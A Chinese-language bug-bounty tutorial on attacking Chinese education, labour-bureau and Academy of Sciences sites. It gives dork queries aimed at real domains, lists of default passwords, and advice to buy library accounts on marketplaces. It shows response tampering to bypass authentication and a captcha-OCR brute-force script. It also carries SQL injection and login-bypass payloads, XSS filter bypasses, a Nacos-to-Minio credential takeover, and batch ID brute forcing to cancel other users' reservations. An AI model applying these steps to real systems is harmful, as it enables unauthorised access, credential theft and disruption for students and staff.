一文带你看懂从脆弱资产收集到SRC通杀案例技术分享
字数 2602
更新时间 2025-12-30 12:16:24

从脆弱资产收集到SRC通杀案例技术教学文档

0x1 前言

本文从脆弱资产的视角介绍信息收集的思路和方法,重点以EDUSRC资产收集姿势进行分享。同时涵盖人社和中国科学院相关漏洞收集方法、EDU平台收录规则,以及通过语雀公开知识库收集操作手册和账户密码泄露等技巧。后续通过企业SRC的SQL排序注入和云安全Minio渗透测试实战案例,以及EDUSRC通杀漏洞进行详细技术分析。

0x2 脆弱资产收集

一、通过搜索引擎搜索关键字

1. EDU资产收集

核心搜索语法:

site:edu.cn intext:操作手册|使用手册|操作视频|使用视频|演示视频|白皮书

利用价值:

  • 操作手册常包含测试账号和密码
  • 系统未及时删除测试账号导致漏洞
  • EDU常用默认密码:111111、000000、123123、123456、654321、666666、身份证后六位

2. 人社关键字收集

部门范围:

  • 人力资源与社会保障部/厅/局(简称人社部/厅/局)
  • 管理的学校:技工学校、技师学院
  • 确认方法:搜索"学校名称 隶属于"

微信小程序测试关键字:

就业训练、劳动就业服务管理中心、高级技工学校、信息采集、人才培养
劳动保障、社会保险、劳动维权、职业介绍、公共就业、创业、人事
仲裁、社会保险、劳动就业服务局、社会保障中心、城乡居民养老保险中心
人才交流开发中心、劳动监察大队、职业技能鉴定中心、机关服务中心
创业担保贷款基金管理中心、创业指导中心、乡镇劳动就业社会保障服务中心
信息和考试中心

3. 中国科学院关键字

目标域名: ac.cn和cas.cn
搜索语法:

site:ac.cn intext:管理|后台|登陆|用户名|密码|系统|帐号|操作手册|使用手册|操作视频|使用视频|演示视频|白皮书
site:cas.cn intext:管理|后台|登陆|用户名|密码|系统|帐号|操作手册|使用手册|操作视频|使用视频|演示视频|白皮书

二、语雀公开知识库搜索

搜索关键字: 操作手册/使用手册/操作视频/使用视频/演示视频/白皮书

三、SRC资产收集技术

1. Google黑客语法大全

注入漏洞检测:

site:edu.cn inurl:id|aspx|jsp|php|asp

文件上传漏洞:

site:edu.cn inurl:file|load|editor|Files

后台登录入口:

site:edu.cn intext:管理|后台|登陆|用户名|密码|验证码|系统|帐号|手册|admin|login|sys|managetem|password|username
site:edu.cn inurl:login|admin|manage|manager|admin_login|login_admin|system|boss|master

敏感信息搜索:

site:edu.cn ( "默认密码" OR "学号" OR "工号")
site:edu.cn "账号、密码、学号"&"附件"

后台接口探测:

site:edu.cn (inurl:login OR inurl:admin OR inurl:index OR inurl:登录) OR (inurl:config | inurl:env | inurl:setting | inurl:backup | inurl:admin | inurl:php)

特殊文件查找:

site:edu.cn filetype:txt OR filetype:xls OR filetype:xlsx OR filetype:doc OR filetype:docx OR filetype:pdf

漏洞倾向参数分类:

  • XSS参数:inurl:q= | inurl:s= | inurl:search= | inurl:query= | inurl:keyword= | inurl:lang=
  • 重定向参数:inurl:url= | inurl:return= | inurl:next= | inurl:redirect= | inurl:redir=
  • SQL注入参数:inurl:id= | inurl:pid= | inurl:category= | inurl:cat= | inurl:action= | inurl:sid=
  • SSRF参数:inurl:http | inurl:url= | inurl:path= | inurl:dest= | inurl:html= | inurl:data=
  • LFI参数:inurl:include | inurl:dir | inurl:detail= | inurl:file= | inurl:folder=
  • RCE参数:inurl:cmd | inurl:exec= | inurl:query= | inurl:code= | inurl:do=

FOFA资产收集语法:

org="China Education and Research Network Center" &&("后台"||"登录")&&("中学"||"技术学院"||"小学"||"职业学院"||"中专"||"幼儿园"||"人社局"||"科学院")

2. 自动化工具使用

在线平台: https://app.pentest-tools.com/scans/new-scan

  • 免费子域名挖掘功能
  • Google黑客图形化界面
  • 配置文件信息自动查询

0x3 统一身份认证绕过技术

一、GitHub信息收集

搜索技巧:

  • 选择代码(Code)标签页
  • 按语言筛选:JavaScript和Python为主
  • 查找账号密码泄露

二、第三方平台账号获取

渠道: 某宝、某鱼、pdd平台搜索"高校图书馆"

三、实战案例:身份认证绕过

攻击流程:

  1. 通过操作手册获取管理员账号(xxadmin)
  2. 尝试密码与账号相同成功登录
  3. 收集学号/工号和身份证信息
  4. 访问统一身份认证后台
  5. 点击忘记密码功能
  6. 绕过手机验证码验证

绕过技术:

  • 拦截返回包修改statusCode为200
  • 修改false为true实现前端校验绕过

四、密保问题绕过

常见弱密保:

  1. 学号作为密保答案 - 通过奖学金名单获取
  2. 幸运数字 - 通常为0-10,可爆破尝试

五、统一身份认证逻辑缺陷通杀

利用条件: 姓名、学号、身份证信息
漏洞特征: 基础信息验证后直接重置密码,JS分析显示通杀特性

0x4 业务安全漏洞-登录认证实战

验证码绕过技术

工具准备:

  • ddddocr库自动识别验证码
  • Python脚本搭建识别服务

识别脚本:

# -*- coding:utf-8 -*-
import ddddocr
from aiohttp import web
import base64

ocr = ddddocr.DdddOcr()
auth_base64 = "f0ngauth"

async def handle_cb(request):
    if request.headers.get('Authorization') != 'Basic ' + auth_base64:
        return web.Response(text='Forbidden', status='403')
    
    img_base64 = await request.text()
    img_bytes = base64.b64decode(img_base64)
    return web.Response(text=ocr.classification(img_bytes)[0:4])

app = web.Application()
app.add_routes([web.post('/reg', handle_cb)])

if __name__ == '__main__':
    web.run_app(app, port=8888)

BurpSuite配置:

  1. 抓取验证码图片数据包
  2. 使用ddddocr插件模板
  3. 设置爆破模式为Pitchfork
  4. 调整延迟避免触发防护

0x5 企业SRC SQL排序注入

技术原理

  • 利用ORDER BY语句的排序功能
  • 可控参数:desc/asc排序方向
  • SQL语句示例:SELECT * FROM users ORDER BY 1 desc/asc

检测方法

注入判断payload:

,1
,0  
,sleep(5)
,exp(999)
,exp(222)

实战案例

利用payload:

updatexml(1,concat(0x7e,(version()),0x7e),1)
extractvalue(1, concat(0x7e, user(), 0x7e))
updatexml(1, concat(0x7c, @@datadir, 0x7c), 1)
extractvalue(1, concat(0x2a, @@version, 0x2a))

0x6 云安全Minio渗透测试

一、Minio简介

  • 开源对象存储系统,兼容AWS S3协议
  • 默认端口9000
  • 集群模式可能泄露MINIO_SECRET_KEY和MINIO_ROOT_PASSWORD

二、渗透测试流程

入口点: Nacos目录泄露
攻击步骤:

  1. 尝试弱口令:admin/123456、nacos/nacos
  2. 使用nacos权限绕过工具添加用户
  3. 登录Nacos查看yml配置文件
  4. 获取Minio的access-key和secret-key
  5. 直接登录Minio管理界面

三、mc工具连接Minio

下载安装:

wget https://dl.minio.org.cn/client/mc/release/linux-amd64/mc
chmod +x ./mc

连接命令:

./mc alias set myminio minio_address access-key secret-key

文件操作:

./mc cp file.txt myminio/bucket/    # 上传
./mc ls myminio/bucket/            # 列表  
./mc rm myminio/bucket/file.txt    # 删除

0x7 图书馆通杀漏洞案例

一、XSS漏洞绕过技巧

初级测试payload:

<s>test<s>
<h1>test</h1>

标签闭合绕过:

</tExtArEa><h1>123</h1>#
</tExtArEa><s>123#//--+
'"></tExtArEa><s>123#//--+

高级绕过方法:

  1. 大小写绕过:<Script>alert(1);</Script>
  2. 双写绕过:<scrscriptipt>alert(1);</scrscriptipt>
  3. 关键字替换:用confirm、prompt代替alert
  4. 符号绕过:使用反引号代替单引号,%0a代替空格

二、越权漏洞实战

攻击流程:

  1. 发现图书馆预约系统
  2. 尝试弱口令和万能密码未果
  3. 找到忘记密码功能
  4. 使用公开的学号姓名信息
  5. 输入自有手机号重置密码
  6. 登录系统发现越权漏洞

万能密码payload:

admin'#
admin'or 1=1--
admin'or' 1=1--
admin"or 1=1--
admin'or''='

越权利用:

  • 账号A取消预约数据包复用
  • 修改id参数取消他人预约
  • 批量爆破id实现大规模取消

0x8 技术总结

本文系统性地介绍了从信息收集到漏洞利用的完整链条,重点强调了脆弱资产收集的重要性。通过多维度搜索技巧、身份认证绕过、业务逻辑漏洞挖掘等实战案例,展现了现代渗透测试的技术深度。建议结合实际环境进行练习,将理论知识转化为实战能力。

相似文章
相似文章
 全屏